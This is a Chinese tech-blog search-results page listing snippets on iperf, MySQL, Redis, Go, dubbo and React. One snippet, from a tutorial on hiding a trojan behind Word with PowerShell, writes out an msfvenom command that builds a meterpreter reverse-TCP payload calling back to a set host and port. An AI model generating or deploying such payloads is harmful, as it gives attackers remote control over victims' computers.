码迷,mamicode.com
首页 >  
搜索关键字:vsphere client    ( 15913个结果
Iperf 网络性能测试工具
iperf是一种命令行工具,用于通过测量服务器可以处理的最大网络吞吐量来诊断网络速度问题。它在遇到网络速度问题时特别有用,通过该工具可以确定哪个服务器无法达到最大吞吐量。 环境: server: centos/redhat 7.4 client:window10 iperf版本: iperf 3.1 ...
分类:其他好文   时间:2021-03-29 11:47:49    阅读次数:0
ubuntu安装mysql
1.执行安装mysql的语句 sudo apt-get install mysql-server mysql-client 2.查看可登陆账户并查看密码 3.获取到了登陆mysql的账户密码登陆 4.之后依次进入mysql数据库,修改root密码,刷新缓存。之后就可以exit退出使用root账户登录 ...
分类:数据库   时间:2021-03-29 11:37:21    阅读次数:0
9、redis.exceptions.AuthenticationError: Client sent AUTH, but no password is set
注册模块连接redis遇到的问题 1、遇到的问题 redis.exceptions.AuthenticationError: Client sent AUTH, but no password is set 2、解决办法 首先打开redis.windows.service.conf(或redis.w ...
分类:其他好文   时间:2021-03-26 15:33:25    阅读次数:0
GO redis
package main import ( "fmt" "github.com/go-redis/redis" ) func main() { client := redis.NewClient(&redis.Options{ Addr: "127.0.0.1:6380", Password: "" ...
分类:其他好文   时间:2021-03-18 14:25:19    阅读次数:0
Powershell配合word伪装木马执行
环境: win7 64位,word2013 生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1122 -f psh-reflection >x.ps1 ? 放到VPS上,这里我们放到本机搭 ...
分类:系统相关   时间:2021-03-18 14:14:35    阅读次数:0
dubbo 参数理解
client 版本0.1 public class RpcParam implements Serializable { private String name; } 版本0.2 public class RpcParam implements Serializable { private Stri ...
分类:其他好文   时间:2021-03-17 14:55:50    阅读次数:0
react debug from VS Code —— the Debugger for Chrome extension
原文:https://code.visualstudio.com/docs/nodejs/reactjs-tutorial To debug the client side React code, we'll need to install the Debugger for Chrome exten ...
分类:其他好文   时间:2021-03-16 14:09:27    阅读次数:0
mysql 设置相关
告诉mysql客户端这边的文字编码 告诉mysql希望返回的结果集编码; set character_set_client=gbk; set character_set_results=gbk; 查看最大上传文件大小 show global variables like 'max_allowed_p ...
分类:数据库   时间:2021-03-16 11:52:41    阅读次数:0
MySQL长时间不登录密码过期解决办法
MySql管理工具 Navicat for MySql的时候,弹出了一个1862 - MySql Your password has expired.To log in you must change it using a client that supports expired password解 ...
分类:数据库   时间:2021-03-15 10:43:19    阅读次数:0
python-cmdb资产管理项目4-资产入库处理以及资产变更记录处理
一 资产入库处理 1.1 连接数据库 在192.168.100.101安装数据库,并给总控机授权可以操作,并创建一个autoserver的数据库,密码123456 settiing.py 配置数据库连接 DATABASES = { 'default': { 'ENGINE': 'django.db. ...
分类:数据库   时间:2021-03-09 13:41:36    阅读次数:0
15913条   上一页 1 ... 13 14 15 16 17 ... 1592 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!